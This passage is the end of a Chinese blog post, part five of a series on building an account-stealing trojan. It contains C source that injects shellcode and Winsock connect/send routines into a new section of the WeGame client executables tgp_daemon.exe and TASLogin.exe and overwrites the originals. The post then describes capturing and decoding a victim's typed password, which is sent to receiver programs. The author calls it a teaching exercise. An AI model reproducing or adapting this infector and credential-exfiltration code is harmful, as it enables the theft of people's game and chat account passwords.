		memcpy(remoteParameter.c[10], psocket, strlen(psocket));
		memcpy(remoteParameter.c[11], phtons, strlen(phtons));
		memcpy(remoteParameter.c[12], pIP, strlen(pIP));
		memcpy(remoteParameter.c[13], pinet_addr, strlen(pinet_addr));
		memcpy(remoteParameter.c[14], pconnect, strlen(pconnect));
		memcpy(remoteParameter.c[15], psend, strlen(psend));
		memcpy(remoteParameter.c[16], pclosesocket, strlen(pclosesocket));
		memcpy(remoteParameter.c[17], pWSACleanup, strlen(pWSACleanup));
		memcpy(remoteParameter.cc[0], pLinkName, sizeof(pLinkName));
		memcpy(remoteParameter.cc[1], pCreateFile, sizeof(pCreateFile));
		memcpy(remoteParameter.cc[2], pDeviceIoControl, sizeof(pDeviceIoControl));
		//write the parameter block into the in-memory image, 0x1000 past the start of the new section
		memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData + 0x1000, (PBYTE)&remoteParameter, sizeof(remoteParameter));
		//write the machine-code blob at the start of the new section
		if (i == 0) {
			memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData, shellcode, sizeof(shellcode));//tgp_daemon.exe
		}
		else
		{
			memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData, shellcode2, sizeof(shellcode2));//TASLogin.exe
		}
		//write the modified image back over the original file, starting at offset 0
		DWORD dwWriteFact = 0;
		DWORD dwPointer = SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
		if (dwPointer == 0xffffffff) {
			printf("文件指针移到头出错!");
			CloseHandle(hFile);
			GlobalFree(pFileMem);
			return;
		}
		BOOL bRet = WriteFile(hFile, pFileMem, dwFileSize + dwApplySize, &dwWriteFact, NULL);
		if (!bRet || dwWriteFact != dwFileSize + dwApplySize) {
			printf("写出出错!");//a short write is only reported; the loop still continues
		}
		CloseHandle(hFile);
		GlobalFree(pFileMem);
		if (i == 0) {
			printf("感染tgp_daemon.exe成功!\n");
		}
		else
		{
			printf("感染TASLogin.exe成功!\n");
		}
	}
	system("pause");
	
}

 

最终运行效果图:

       盗号木马之旅(五)

 上面3个是驱动文件,中间右边是病毒EXE,中间左边是WeGame。

盗号木马之旅(五)

这两个是接收账号和密码的EXE。

盗号木马之旅(五)

上面是安装的驱动。

盗号木马之旅(五)

 感染效果图。

盗号木马之旅(五)

我输入的密码是0987654321,密码本是通过模拟按键1234567890获得的。可以看到模拟1234567890获得的对应关系是5341726890。接下来我捕获的未解密密码是0986271435,对照密码本翻译显然就是我的输入密码0987654321.O(∩_∩)O!!!


结语:

     作为一个新手写这个盗号木马其实还是碰到很多问题的,不知道调试了多少次-。-//。这个木马实用性不强,适合教学吧,或者娱乐哈哈。这里完整地介绍了一个木马的生成过程,不知道其他人怎么做木马的,是不是和我差不多-。-///。
